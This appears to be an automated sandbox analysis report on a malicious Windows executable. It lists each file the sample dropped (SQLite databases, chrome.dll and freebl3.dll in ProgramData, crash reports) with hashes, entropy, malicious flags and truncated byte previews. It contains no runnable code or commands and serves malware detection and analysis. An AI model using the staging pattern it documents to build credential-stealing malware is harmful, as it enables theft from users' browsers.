                                                                                                                                            SSDEEP:196608:50ipMncd0lHU0kioa09gMC1tFKCnuvoMTQybYD+AvBjtO7:5VpBdxRej7nuPTH25tO
                                                                                                                                            MD5:D9A5E741B1F67593422BFB1A165288BB
                                                                                                                                            SHA1:0BC42E46E97FBF3B0754D26D88E43945EDC31A0B
                                                                                                                                            SHA-256:C81A924446D324B3AEB0772DFD9CBED34FB878AFF823BA2888362A22F7328FE8
                                                                                                                                            SHA-512:5A463B581C18E2A2076BBF888EE838745EB8FEA6E718B5882951E18A213F530589CB5CF3D61E2CC4014556DC65A327B56B42B915BD9CEA488ADB4782AF151EA4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...Cb#g.........."...........l................@.............................`......-.....`.................................................B0n.d....Pn.H....................P..............................(@n.(................................................... .........o.................. ..` .*... ..:....t..............@..@ ..l..P..`.Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n...... R.............@....tls.........@n......"R..................rsrc........Pn......$R.............@..@.themida..W..`n......(R.............`....boot....l2......l2..(R.............`..`.reloc.......P.........................@........................................................

                                                                                                                                            C:\ProgramData\HJJKJJDHCGCAECAAECFH

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\IJEBKKEGDBFIIEBFHIEHCBKJJK

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5242880
                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\KKJJEBFC

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8192
                                                                                                                                            Entropy (8bit):0.363788168458258
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                                            MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                                            SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                                                            SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                                            SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1310720
                                                                                                                                            Entropy (8bit):1.3107914072505267
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr6:KooCEYhgYEL0In
                                                                                                                                            MD5:0B611A318E33E0D30B479A17D66961BC
                                                                                                                                            SHA1:C9F2774BE979752E1244A97D58E705D8E52269F6
                                                                                                                                            SHA-256:9AA3BD9920EA5BA704ADA5A3CCE3DBE93837828AA1FAA106D74292341A5107A2
                                                                                                                                            SHA-512:D96FD026C786D5677AB97863C10B557B521A5149B42930ED5FA50B649344D4EF5C6AF92C01237C57CC2C6DDFEBD3932987C00DEAEA54E9C6D158F79985C71DEE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf22c24ec, page size 16384, Windows version 10.0
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1310720
                                                                                                                                            Entropy (8bit):0.42222015878071656
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:LTPSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1kX:LTPazag03A2UrzJDO
                                                                                                                                            MD5:C83D8128A62FB55FF5BF3E39DE8B4BFB
                                                                                                                                            SHA1:0D79FA20E6AE79C02145C8D2E268495E90951FE1
                                                                                                                                            SHA-256:80849F206C7FB91EDF88F90068E465CC3E0007B9AD08C644EDA4F807C2FB5680
                                                                                                                                            SHA-512:748896F4D9DDC6BAC7FC5B2CB44505FD65C6E90E3F42D694E99AC13910A8190B85E052E074F33E3B2BBCA6F78A85B4D1E8A3CBBF67EE459DB282D06FA4E0965D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.,$.... .......Y.......X\...;...{......................n.%..........|M......|..h.#..........|M.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................>.....|M..........................|M..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):0.07908788167912764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:MllsetYeVwUreXllKdZobISj8SIHSZoXllillOE/tlnl+/rTc:slzVwUreXlcdZe5OzXlIpMP
                                                                                                                                            MD5:58F03C16401DA78FF0A9FA4972C8FED6
                                                                                                                                            SHA1:739EB80C8ECB0FBB6556B1CD3050ABA281B17D8A
                                                                                                                                            SHA-256:C940B39F81C7906A55CD90B3C9D139C18E924885F7823C679B62DAFCC9C8775E
                                                                                                                                            SHA-512:D0EBF4981175F02A997DB401B0D26350168B2FB3589E8BC161BB5F10A24336692422D834AE4639FD4C165A747DEF4E44DD7C986654E78F7298A25A80586B7CC2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:m..].....................................;...{.......|.......|M..............|M......|M..7.......|-..........................|M.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WGo3ga1AL9.exe_c64af2e17828a752ecb1c78a0f516ee4dc0108_ed2ad96c_09b19eb5-2db0-4408-8cc8-8b51e692e205\Report.wer

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65536
                                                                                                                                            Entropy (8bit):1.2208447652653296
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:hFkvoF0kigMajsqZrP2MajyzuiFRZ24IO8y4:oAmkig/jlkOzuiFRY4IO8y
                                                                                                                                            MD5:B0F5323A38EF196BDD59B858D53E07CA
                                                                                                                                            SHA1:E608356F3F0F4968920D5D5CA51CB39E8303C4AE
                                                                                                                                            SHA-256:82E53BEFCF14266364A6C23C6AFBC0C48B08424928C40DD4C3E7A94B3DC86E93
                                                                                                                                            SHA-512:BF8A6BDC78F990C425A002BF2D67A5B26129A654F4497D843D7413B1760C45B75B7C3AC64DDA561F4741B00A6CC6BE0498A27A197A716CF317F90B48D2FA1517
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.8.6.4.7.6.2.7.3.1.9.5.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.8.6.4.7.6.3.5.9.1.3.1.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.b.1.9.e.b.5.-.2.d.b.0.-.4.4.0.8.-.8.c.c.8.-.8.b.5.1.e.6.9.2.e.2.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.5.2.6.9.6.3.-.0.b.5.5.-.4.1.d.e.-.8.6.c.7.-.d.f.d.d.2.1.7.8.f.1.8.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.G.o.3.g.a.1.A.L.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.8.c.-.0.0.0.1.-.0.0.1.4.-.1.5.d.1.-.3.e.9.d.a.f.2.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.5.2.8.c.8.c.e.0.4.7.0.0.d.8.8.3.a.9.1.6.4.e.1.f.5.c.8.f.d.e.3.0.0.0.0.f.f.f.f.!.0.0.0.0.7.c.3.8.e.0.0.0.6.0.1.2.4.1.7.6.a.e.1.b.5.a.d.7.f.1.7.d.d.8.a.2.0.2.4.4.5.f.2.6.!.W.G.o.3.g.a.1.A.L.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E20.tmp.dmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Thu Oct 31 16:12:43 2024, 0x1205a4 type
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):74862
                                                                                                                                            Entropy (8bit):2.643008515367856
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:X55avmmZ1WEsgED1XvXxSqQd6zS3SnfoxqWXW:X/smLlgEBXvFmmmysG
                                                                                                                                            MD5:54A76BF82C53B8FDCACC053454D2605F
                                                                                                                                            SHA1:FFA73C6904DD76DFA1CD98EF42EBC5DE47160F6E
                                                                                                                                            SHA-256:FEFAE1651A79B1BA68C96EE2446E9A5C60CA5895A14414D2FA864838E9D6232C
                                                                                                                                            SHA-512:86D53FFD9EE0B7921C0369517BCD3B03EBC821DC55448ED59921E6356494432C9AAF1697DD7562522A1993EB9D73D43755CBE2730CB54337143B37B3C36C4762
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MDMP..a..... .......{.#g............4............%..<...........`?..........T.......8...........T............z...............,..........................................................................................eJ......P/......GenuineIntel............T...........O.#g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8025.tmp.WERInternalMetadata.xml

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8454
                                                                                                                                            Entropy (8bit):3.699293146455658
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:R6l7wVeJiF646Y9OSUVggmfB4bQpDr89b+zsfwKm:R6lXJ4646YUSUVggmfBC+YfM
                                                                                                                                            MD5:9A0DE19A712E171BD90CADF672E3EA1A
                                                                                                                                            SHA1:B47EE192BA18E0587076A6FF5DAC4D84599F02E1
                                                                                                                                            SHA-256:C3D5D3725428A89F611F0F120255882E8A302C47626084C017E49A9BF1D19414
                                                                                                                                            SHA-512:243710519AE04ACCEBE020E503AFF3EB0F226FC00FC094D029E1CE7293ABF04DDAE86C993E489B4CB61EAE645DECF4334CCF4935B188001CA092EDFBD84C4C49
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.0.8.<./.P.i.

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8054.tmp.xml

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4724
                                                                                                                                            Entropy (8bit):4.482580617033061
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cvIwWl8zs5Jg77aI94TWpW8VYfYm8M4JLMRSFO3F7+q8vuRSFOQMWTSVSDwMdd:uIjfLI7Wi7VDJ8qaKaq/MWOALdd
                                                                                                                                            MD5:72A16DE58DFB196AC8507F5DC664AD10
                                                                                                                                            SHA1:B935E17460B82E33947917686D754B78FCD2BF72
                                                                                                                                            SHA-256:2D55CC2D3CB85685A72046B1BF21BED91858E7D3518090D4D3E56920073F70C3
                                                                                                                                            SHA-512:9C6CA4B1CAFB015DC963601982F43816DA34365DA43E7C6296E3EB8A461CB2567DA12A886149F14B2481801D4C99997AC69EDA02DBD6FD427BF3B22502E27FF5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="567795" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8062.tmp.csv

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):86310
                                                                                                                                            Entropy (8bit):3.0619799060662003
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:kt1cZP/Zkx/jBzMIJGrINv0TqZHrUSYBwWkgASxxs:NB/ZkxxMXAvqqprUSYyWxASc
                                                                                                                                            MD5:E54FE71D21E0A56C81A3D716214EB9D8
                                                                                                                                            SHA1:EE40916DBD468F517B22093A70E28524DAB64766
                                                                                                                                            SHA-256:85FE15AEF97DCB1E756E573D3D84C2FC831B4BC772829C7BD3D51C4430F921EB
                                                                                                                                            SHA-512:EF9F864449355156154A43F9F779065A0E548572E0A47A9F00019A75B7CC27C7C21E9BCC2C49D37258DBCC528A9541BD9CD27343395A5885E022907EF7E4BF54
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER80F0.tmp.txt

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13340
                                                                                                                                            Entropy (8bit):2.6870076245156356
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:TiZYWkefFVY/YFHWeHWYEZDLtHisIu/1weW/Yla/ceMxiGIIK3:2ZDlYdYYa/ceMxiBIK3
                                                                                                                                            MD5:45CE6021C629656DA8CBE3106B6BD49C
                                                                                                                                            SHA1:75954F8CB426866892D0E8DAE401FE495CB12CEB
                                                                                                                                            SHA-256:A78D2210BC860EF1A9B3C40808738A31827FB5B75194E78B34A924ECEF4C531F
                                                                                                                                            SHA-512:6597F22D3BCF4F10314D3936FF204E48AF62E9384DE65787A3A91443DE2E3A48A1AF279EC747AD082490D2E1B7D674022358F9DAA4FAB3169083B49EE92CBA33
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                            C:\ProgramData\chrome.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):692736
                                                                                                                                            Entropy (8bit):6.304379785339226
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
                                                                                                                                            MD5:EDA18948A989176F4EEBB175CE806255
                                                                                                                                            SHA1:FF22A3D5F5FB705137F233C36622C79EAB995897
                                                                                                                                            SHA-256:81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                                                                                                                                            SHA-512:160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: I43xo3KKfS.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Ky4J8k89A7.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m|5.l<M.m|5.l.M.m|5.l#M.m'..l"M.m'..l'M.m'..l.M.m|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\freebl3.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):685392
                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
